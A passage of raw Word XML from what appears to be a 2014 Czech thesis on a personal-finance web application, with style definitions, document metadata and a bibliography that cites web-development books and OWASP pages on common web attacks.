    <w:name w:val="Document Map"/>
    <w:basedOn w:val="Normln"/>
    <w:semiHidden/>
    <w:rsid w:val="00AC010E"/>
    <w:pPr>
      <w:shd w:val="clear" w:color="auto" w:fill="000080"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Sledovanodkaz">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="Standardnpsmoodstavce"/>
    <w:rsid w:val="00AC010E"/>
    <w:rPr>
      <w:color w:val="800080"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Pokraovnseznamu">
    <w:name w:val="List Continue"/>
    <w:basedOn w:val="Normln"/>
    <w:rsid w:val="00AC010E"/>
    <w:pPr>
      <w:ind w:left="283"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Zkladntext2">
    <w:name w:val="Body Text 2"/>
    <w:basedOn w:val="Normln"/>
    <w:rsid w:val="00AC010E"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Pokec">
    <w:name w:val="Pokec"/>
    <w:basedOn w:val="Standardnpsmoodstavce"/>
    <w:rsid w:val="00AC010E"/>
    <w:rPr>
      <w:emboss/>
      <w:color w:val="FF0000"/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Zkladntext3">
    <w:name w:val="Body Text 3"/>
    <w:basedOn w:val="Normln"/>
    <w:rsid w:val="00AC010E"/>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7F5BF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F5BF2"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Code">
    <w:name w:val="Code"/>
    <w:basedOn w:val="Normln"/>
    <w:next w:val="Normln"/>
    <w:link w:val="CodeChar"/>
    <w:qFormat/>
    <w:rsid w:val="001B640C"/>
    <w:pPr>
      <w:pBdr>
        <w:top w:val="single" w:sz="4" w:space="6" w:color="auto"/>
        <w:left w:val="single" w:sz="4" w:space="6" w:color="auto"/>
        <w:bottom w:val="single" w:sz="4" w:space="6" w:color="auto"/>
        <w:right w:val="single" w:sz="4" w:space="6" w:color="auto"/>
      </w:pBdr>
      <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
      <w:spacing w:after="240" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="397" w:right="170" w:hanging="227"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="22"/>
      <w:lang w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Odstavecseseznamem">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normln"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="007F5BF2"/>
    <w:pPr>
      <w:spacing w:before="120" w:after="240"/>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cstheme="minorBidi"/>
      <w:szCs w:val="22"/>
      <w:lang w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CodeChar">
    <w:name w:val="Code Char"/>
    <w:basedOn w:val="Standardnpsmoodstavce"/>
    <w:link w:val="Code"/>
    <w:rsid w:val="001B640C"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:szCs w:val="22"/>
      <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
      <w:lang w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Textpoznpodarou">
    <w:name w:val="footnote text"/>
    <w:basedOn w:val="Normln"/>
    <w:link w:val="TextpoznpodarouChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="007F5BF2"/>
    <w:pPr>
      <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cstheme="minorBidi"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="TextpoznpodarouChar">
    <w:name w:val="Text pozn. pod čarou Char"/>
    <w:basedOn w:val="Standardnpsmoodstavce"/>
    <w:link w:val="Textpoznpodarou"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="007F5BF2"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cstheme="minorBidi"/>
      <w:lang w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Znakapoznpodarou">
    <w:name w:val="footnote reference"/>
    <w:basedOn w:val="Standardnpsmoodstavce"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="007F5BF2"/>
    <w:rPr>
      <w:vertAlign w:val="superscript"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Nadpis1Char">
    <w:name w:val="Nadpis 1 Char"/>
    <w:basedOn w:val="Standardnpsmoodstavce"/>
    <w:link w:val="Nadpis1"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00595270"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:caps/>
      <w:kern w:val="28"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Normlnweb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normln"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00595270"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Podnadpis5">
    <w:name w:val="Podnadpis 5"/>
    <w:basedOn w:val="Normln"/>
    <w:next w:val="Normln"/>
    <w:link w:val="Podnadpis5Char"/>
    <w:qFormat/>
    <w:rsid w:val="00FC281F"/>
    <w:pPr>
      <w:keepNext/>
      <w:spacing w:after="0"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:i/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Podnadpis5Char">
    <w:name w:val="Podnadpis 5 Char"/>
    <w:basedOn w:val="Standardnpsmoodstavce"/>
    <w:link w:val="Podnadpis5"/>
    <w:rsid w:val="00FC281F"/>
    <w:rPr>
      <w:b/>
      <w:i/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Nadpisobsahu">
    <w:name w:val="TOC Heading"/>
    <w:basedOn w:val="Nadpis1"/>
    <w:next w:val="Normln"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00B02132"/>
    <w:pPr>
      <w:keepLines/>
      <w:pageBreakBefore w:val="0"/>
      <w:numPr>
        <w:numId w:val="0"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="clear" w:pos="567"/>
      </w:tabs>
      <w:spacing w:before="480" w:after="0" w:line="276" w:lineRule="auto"/>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:caps w:val="0"/>
      <w:color w:val="365F91" w:themeColor="accent1" w:themeShade="BF"/>
      <w:kern w:val="0"/>
      <w:lang w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Bibliografie">
    <w:name w:val="Bibliography"/>
    <w:basedOn w:val="Normln"/>
    <w:next w:val="Normln"/>
    <w:uiPriority w:val="37"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="003C2CD4"/>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SN690CitacePRONum.xsl" StyleName="ČSN 690 Citace PRO Num">
  <b:Source>
    <b:Tag>0MYqS4npIoWVXfZV</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Laš</b:Last>
            <b:First>Jan</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:YearAccessed>2014-03-15</b:YearAccessed>
    <b:Year>2014</b:Year>
    <b:InternetSiteTitle>eÚčty.cz</b:InternetSiteTitle>
    <b:ShortTitle>eÚčty.cz</b:ShortTitle>
    <b:URL>http://eucty.cz</b:URL>
    <b:RefOrder>6</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>ce6t5aPxhBwLKetI</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Author>
      <b:Author>
        <b:Corporate>Fresh Garden s.r.o.</b:Corporate>
      </b:Author>
    </b:Author>
    <b:YearAccessed>2014-03-15</b:YearAccessed>
    <b:Year>2014</b:Year>
    <b:InternetSiteTitle>Moře financí</b:InternetSiteTitle>
    <b:ShortTitle>Moře financí</b:ShortTitle>
    <b:URL>https://www.more-financi.cz/</b:URL>
    <b:RefOrder>7</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>caKfmQLoznHu4p5A</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Author>
      <b:Author>
        <b:Corporate>Toshl Inc.</b:Corporate>
      </b:Author>
    </b:Author>
    <b:YearAccessed>2014-03-22</b:YearAccessed>
    <b:Year>2014</b:Year>
    <b:InternetSiteTitle>Toshl Finance: Personal Finance Manager and Expense Tracker</b:InternetSiteTitle>
    <b:ShortTitle>Toshl Finance</b:ShortTitle>
    <b:URL>https://toshl.com/</b:URL>
    <b:RefOrder>8</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>DBmrpr0B1wKcuKKF</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Author>
      <b:Author>
        <b:Corporate>OWASP Foundation Inc.</b:Corporate>
      </b:Author>
    </b:Author>
    <b:YearAccessed>2014-03-23</b:YearAccessed>
    <b:Year>2014</b:Year>
    <b:InternetSiteTitle>OWASP</b:InternetSiteTitle>
    <b:ShortTitle>OWASP</b:ShortTitle>
    <b:URL>http://www.owasp.org</b:URL>
    <b:RefOrder>9</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>pTgcSb2b8rOKPaB2</b:Tag>
    <b:SourceType>Misc</b:SourceType>
    <b:Author>
      <b:Author>
        <b:Corporate>OWASP Foundation Inc.</b:Corporate>
      </b:Author>
    </b:Author>
    <b:YearAccessed>2013-11-11</b:YearAccessed>
    <b:Year>2013</b:Year>
    <b:Title>OWASP Top 10 - 2013: The Ten Most Critical Web Application Security Risks</b:Title>
    <b:ShortTitle>OWASP Top 10 - 2013</b:ShortTitle>
    <b:URL>http://owasptop10.googlecode.com/files/OWASP%20Top%2010%20-%202013.pdf</b:URL>
    <b:RefOrder>10</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>rPxQXOGKHiBgcdvr</b:Tag>
    <b:SourceType>DocumentFromInternetSite</b:SourceType>
    <b:Author>
      <b:Author/>
      <b:BookAuthor/>
    </b:Author>
    <b:InternetSiteTitle>OWASP</b:InternetSiteTitle>
    <b:YearAccessed>2014-03-23</b:YearAccessed>
    <b:Year>2009</b:Year>
    <b:Title>Man-in-the-middle attack</b:Title>
    <b:ShortTitle>Man-in-the-middle attack</b:ShortTitle>
    <b:URL>https://www.owasp.org/index.php/Man-in-the-middle_attack</b:URL>
    <b:RefOrder>13</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>zi7QEcKlXoi1VMuN</b:Tag>
    <b:SourceType>DocumentFromInternetSite</b:SourceType>
    <b:Author>
      <b:Author/>
      <b:BookAuthor/>
    </b:Author>
    <b:InternetSiteTitle>OWASP</b:InternetSiteTitle>
    <b:YearAccessed>2013-11-14</b:YearAccessed>
    <b:Year>2013</b:Year>
    <b:Title>SQL Injection</b:Title>
    <b:ShortTitle>SQL Injection</b:ShortTitle>
    <b:URL>https://www.owasp.org/index.php/SQL_Injection</b:URL>
    <b:RefOrder>11</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>8HoKXwhUe2cSlVMc</b:Tag>
    <b:SourceType>DocumentFromInternetSite</b:SourceType>
    <b:Author>
      <b:Author/>
      <b:BookAuthor/>
    </b:Author>
    <b:InternetSiteTitle>OWASP</b:InternetSiteTitle>
    <b:YearAccessed>2013-11-14</b:YearAccessed>
    <b:Year>2011</b:Year>
    <b:Title>Session hijacking attack</b:Title>
    <b:ShortTitle>Session hijacking attack</b:ShortTitle>
    <b:URL>https://www.owasp.org/index.php/Session_hijacking_attack</b:URL>
    <b:RefOrder>12</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>nLrgkRMny1T6cmvm</b:Tag>
    <b:SourceType>DocumentFromInternetSite</b:SourceType>
    <b:Author>
      <b:Author/>
      <b:BookAuthor/>
    </b:Author>
    <b:InternetSiteTitle>OWASP</b:InternetSiteTitle>
    <b:YearAccessed>2013-11-14</b:YearAccessed>
    <b:Year>2013</b:Year>
    <b:Title>Cross-site Scripting (XSS)</b:Title>
    <b:ShortTitle>Cross-site Scripting (XSS)</b:ShortTitle>
    <b:URL>https://www.owasp.org/index.php/Cross-site_Scripting_%28XSS%29</b:URL>
    <b:RefOrder>14</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>mr0BvqfkkwAvCy3F</b:Tag>
    <b:SourceType>DocumentFromInternetSite</b:SourceType>
    <b:Author>
      <b:Author/>
      <b:BookAuthor/>
    </b:Author>
    <b:InternetSiteTitle>OWASP</b:InternetSiteTitle>
    <b:YearAccessed>2013-11-14</b:YearAccessed>
    <b:Year>2013</b:Year>
    <b:Title>Cross-Site Request Forgery (CSRF)</b:Title>
    <b:ShortTitle>Cross-Site Request Forgery (CSRF)</b:ShortTitle>
    <b:URL>https://www.owasp.org/index.php/CSRF</b:URL>
    <b:RefOrder>15</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>qpAkHKvlrZ75u3l5</b:Tag>
    <b:SourceType>Book</b:SourceType>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Špinar</b:Last>
            <b:First>David</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:StandardNumber>ISBN 80-868-1511-0</b:StandardNumber>
    <b:Edition>Vyd. 1.</b:Edition>
    <b:Year>2004</b:Year>
    <b:City>Brno</b:City>
    <b:Publisher>Zoner Press</b:Publisher>
    <b:Title>Tvoříme přístupné webové stránky: připraveno s ohledem na novelu Zákona č. 365/2000 Sb., o informačních systémech veřejné správy</b:Title>
    <b:ShortTitle>Tvoříme přístupné webové stránky</b:ShortTitle>
    <b:Pages>360 s.</b:Pages>
    <b:RefOrder>3</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>UXdnyjNCv2ie9ODJ</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Svetlík</b:Last>
            <b:First>Slavomír</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:YearAccessed>2014-02-22</b:YearAccessed>
    <b:Year>2014</b:Year>
    <b:InternetSiteTitle>RQ Money</b:InternetSiteTitle>
    <b:ShortTitle>RQ Money</b:ShortTitle>
    <b:URL>http://www.rq.sk/</b:URL>
    <b:RefOrder>4</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>cuy9UcOo3YOpPgsE</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Author>
      <b:Author>
        <b:Corporate>Evolus</b:Corporate>
      </b:Author>
    </b:Author>
    <b:YearAccessed>2014-04-10</b:YearAccessed>
    <b:Year>2012</b:Year>
    <b:InternetSiteTitle>Pencil Project</b:InternetSiteTitle>
    <b:ShortTitle>Pencil Project</b:ShortTitle>
    <b:URL>http://pencil.evolus.vn/</b:URL>
    <b:RefOrder>16</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>LJxnBPZxgc8PiHBo</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Author>
      <b:Author/>
    </b:Author>
    <b:YearAccessed>2014-04-10</b:YearAccessed>
    <b:Year>2014</b:Year>
    <b:InternetSiteTitle>Bootstrap</b:InternetSiteTitle>
    <b:ShortTitle>Bootstrap</b:ShortTitle>
    <b:URL>http://getbootstrap.com/</b:URL>
    <b:RefOrder>18</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>deVAJcbTgKKOs1K9</b:Tag>
    <b:SourceType>Book</b:SourceType>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Krug</b:Last>
            <b:First>Steve</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:StandardNumber>ISBN 80-251-1291-8</b:StandardNumber>
    <b:Edition>2. aktualiz. vyd.</b:Edition>
    <b:Year>2006</b:Year>
    <b:City>Brno</b:City>
    <b:Publisher>Computer Press</b:Publisher>
    <b:Title>Web design: nenuťte uživatele přemýšlet!</b:Title>
    <b:ShortTitle>Web design</b:ShortTitle>
    <b:Pages>167 s.</b:Pages>
    <b:RefOrder>2</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>a5Pt1zMYdT2B05j4</b:Tag>
    <b:SourceType>Book</b:SourceType>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Nielsen</b:Last>
            <b:First>Jakob</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Tahir</b:Last>
            <b:First>Marie</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:StandardNumber>ISBN 80-868-1518-8</b:StandardNumber>
    <b:Edition>Vyd. 1.</b:Edition>
    <b:Year>2005</b:Year>
    <b:City>Brno</b:City>
    <b:Publisher>Zoner Press</b:Publisher>
    <b:Title>Použitelnost domovských stránek</b:Title>
    <b:ShortTitle>Použitelnost domovských stránek</b:ShortTitle>
    <b:Pages>323 s.</b:Pages>
    <b:RefOrder>17</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>yLEK3MrsDlJi2uxG</b:Tag>
    <b:SourceType>Book</b:SourceType>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>MacDonald</b:Last>
            <b:First>Matthew</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Freeman</b:Last>
            <b:First>Adam</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Szpuszta</b:Last>
            <b:First>Mario</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:StandardNumber>ISBN 978-80-7413-131-8</b:StandardNumber>
    <b:Edition>Vyd. 1.</b:Edition>
    <b:Year>2011</b:Year>
    <b:City>Brno</b:City>
    <b:Publisher>Zoner Press</b:Publisher>
    <b:Title>ASP.NET 4 a C# 2010: tvorba dynamických stránek profesionálně</b:Title>
    <b:ShortTitle>ASP.NET 4 a C# 2010</b:ShortTitle>
    <b:Pages>880 s.</b:Pages>
    <b:RefOrder>19</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>YmeR94cSTyIFN3m7</b:Tag>
    <b:SourceType>Book</b:SourceType>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Skeet</b:Last>
            <b:First>Jon</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:StandardNumber>ISBN 19-351-8247-1</b:StandardNumber>
    <b:Edition>2</b:Edition>
    <b:Year>2011</b:Year>
    <b:City>Stamford, CT</b:City>
    <b:Publisher>Manning</b:Publisher>
    <b:Title>C# in depth: Second Edition</b:Title>
    <b:ShortTitle>C# in depth</b:ShortTitle>
    <b:Pages>554</b:Pages>
    <b:RefOrder>20</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>RDYSESMuLfUdZo1R</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Author>
      <b:Author/>
    </b:Author>
    <b:YearAccessed>2014-02-02</b:YearAccessed>
    <b:Year>2014</b:Year>
    <b:Publisher>Microsoft</b:Publisher>
    <b:InternetSiteTitle>MSDN – Microsoft Developer Network</b:InternetSiteTitle>
    <b:ShortTitle>MSDN – Microsoft Developer Network</b:ShortTitle>
    <b:URL>http://msdn.microsoft.com</b:URL>
    <b:RefOrder>21</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>ykUXSwBZhSedNE28</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Author>
      <b:Author>
        <b:Corporate>W3C</b:Corporate>
      </b:Author>
    </b:Author>
    <b:YearAccessed>2014-04-22</b:YearAccessed>
    <b:Year>2013</b:Year>
    <b:InternetSiteTitle>HTML5</b:InternetSiteTitle>
    <b:ShortTitle>HTML5</b:ShortTitle>
    <b:URL>http://www.w3.org/TR/html5/</b:URL>
    <b:RefOrder>23</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Ttn7fP9ha9qrrpcV</b:Tag>
    <b:SourceType>Book</b:SourceType>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Croft</b:Last>
            <b:First>Jeff</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Lloyd</b:Last>
            <b:First>Ian</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Rubin</b:Last>
            <b:First>Dan</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:StandardNumber>ISBN 978-80-251-1705-7</b:StandardNumber>
    <b:Edition>Vyd. 1.</b:Edition>
    <b:Year>2007</b:Year>
    <b:City>Brno</b:City>
    <b:Publisher>Computer Press</b:Publisher>
    <b:Title>Mistrovství v CSS: pokročilé techniky pro webové designéry a vývojáře</b:Title>
    <b:ShortTitle>Mistrovství v CSS</b:ShortTitle>
    <b:Pages>409 s.</b:Pages>
    <b:RefOrder>24</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>FfS91T4XnZgrDqV4</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Deveria</b:Last>
            <b:First>Alexis</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:YearAccessed>2014-04-22</b:YearAccessed>
    <b:Year>2014</b:Year>
    <b:InternetSiteTitle>Can I use...</b:InternetSiteTitle>
    <b:ShortTitle>Can I use...</b:ShortTitle>
    <b:URL>http://caniuse.com/</b:URL>
    <b:RefOrder>25</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>b1h7RmDEYrloDwAv</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Author>
      <b:Author>
        <b:Corporate>The jQuery Foundation</b:Corporate>
      </b:Author>
    </b:Author>
    <b:YearAccessed>2014-04-22</b:YearAccessed>
    <b:Year>2014</b:Year>
    <b:InternetSiteTitle>jQuery</b:InternetSiteTitle>
    <b:ShortTitle>jQuery</b:ShortTitle>
    <b:URL>http://jquery.com/</b:URL>
    <b:RefOrder>26</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>KZn2tMUn6lDoWjNu</b:Tag>
    <b:SourceType>Book</b:SourceType>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Lacko</b:Last>
            <b:First>Luboslav</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:StandardNumber>ISBN 80-722-6975-5</b:StandardNumber>
    <b:Edition>Vyd. 1.</b:Edition>
    <b:Year>2003</b:Year>
    <b:City>Brno</b:City>
    <b:Publisher>Computer Press</b:Publisher>
    <b:Title>SQL hotová řešení: k okamžitému použití</b:Title>
    <b:ShortTitle>SQL hotová řešení</b:ShortTitle>
    <b:Pages>298 s.</b:Pages>
    <b:RefOrder>22</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>NVcSdeuknf4iDPnX</b:Tag>
    <b:SourceType>Misc</b:SourceType>
    <b:Author>
      <b:Author>
        <b:Corporate>STEM/MARK, a.s.</b:Corporate>
      </b:Author>
    </b:Author>
    <b:YearAccessed>2014-03-09</b:YearAccessed>
    <b:Year>2010</b:Year>
    <b:Title>Finanční gramotnost v ČR: Kvantitativní výzkum – Finanční gramotnost obyvatel ČR</b:Title>
    <b:ShortTitle>Finanční gramotnost v ČR</b:ShortTitle>
    <b:Pages>88</b:Pages>
    <b:URL>http://www.mfcr.cz/assets/cs/media/Odborne-vyzkumy_2010-12_Zaverecna-zprava-z-vyzkumu-plne-zneni-STEMMARK.pdf</b:URL>
    <b:RefOrder>1</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>ZGMbMkyPTUp6hSwR</b:Tag>
    <b:SourceType>DocumentFromInternetSite</b:SourceType>
    <b:Author>
      <b:Author>
        <b:Corporate>Google</b:Corporate>
      </b:Author>
      <b:BookAuthor>
        <b:Corporate>Google</b:Corporate>
      </b:BookAuthor>
    </b:Author>
    <b:InternetSiteTitle>Google Developers</b:InternetSiteTitle>
    <b:YearAccessed>2014-04-22</b:YearAccessed>
    <b:Year>2014</b:Year>
    <b:Title>Google Charts</b:Title>
    <b:ShortTitle>Google Charts</b:ShortTitle>
    <b:URL>https://developers.google.com/chart/</b:URL>
    <b:Guid>{484315C1-0AE5-452A-85D2-34E32040C9C3}</b:Guid>
    <b:LCID>0</b:LCID>
    <b:RefOrder>28</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>TewJQFLWmgWb9FRs</b:Tag>
    <b:SourceType>DocumentFromInternetSite</b:SourceType>
    <b:Author>
      <b:Author>
        <b:Corporate>Google</b:Corporate>
      </b:Author>
      <b:BookAuthor>
        <b:Corporate>Google</b:Corporate>
      </b:BookAuthor>
    </b:Author>
    <b:InternetSiteTitle>Google Play</b:InternetSiteTitle>
    <b:YearAccessed>2014-02-22</b:YearAccessed>
    <b:Year>2014</b:Year>
    <b:Title>My Budget Book</b:Title>
    <b:ShortTitle>My Budget Book</b:ShortTitle>
    <b:URL>https://market.android.com/details?id=com.onetwoapps.mh</b:URL>
    <b:Guid>{655FDDF5-77D9-43F5-887D-F3ACAB6C9C16}</b:Guid>
    <b:LCID>0</b:LCID>
    <b:RefOrder>5</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>o0dTUM0VB7z3ecmj</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Author>
      <b:Author>
        <b:Corporate>Google</b:Corporate>
      </b:Author>
    </b:Author>
    <b:YearAccessed>2014-04-22</b:YearAccessed>
    <b:Year>2014</b:Year>
    <b:InternetSiteTitle>AngularJS: Superheroic JavaScript MVW Framework</b:InternetSiteTitle>
    <b:ShortTitle>AngularJS</b:ShortTitle>
    <b:URL>https://angularjs.org/</b:URL>
    <b:Guid>{5B622CB2-56B1-4F57-AC8D-90206BEB84A2}</b:Guid>
    <b:LCID>0</b:LCID>
    <b:RefOrder>27</b:RefOrder>
  </b:Source>
</b:Sources>
</file>

<file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{BF0B89D2-E3E6-46A1-B093-799A01BAF0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5958</TotalTime>
  <Pages>108</Pages>
  <Words>19947</Words>
  <Characters>117693</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>980</Lines>
  <Paragraphs>274</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
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>137366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Tomáš</dc:creator>
  <cp:lastModifiedBy>Filip Tesař</cp:lastModifiedBy>
  <cp:revision>704</cp:revision>
  <cp:lastPrinted>2014-05-08T12:04:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2014-03-09T10:04:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2014-05-09T11:29:00Z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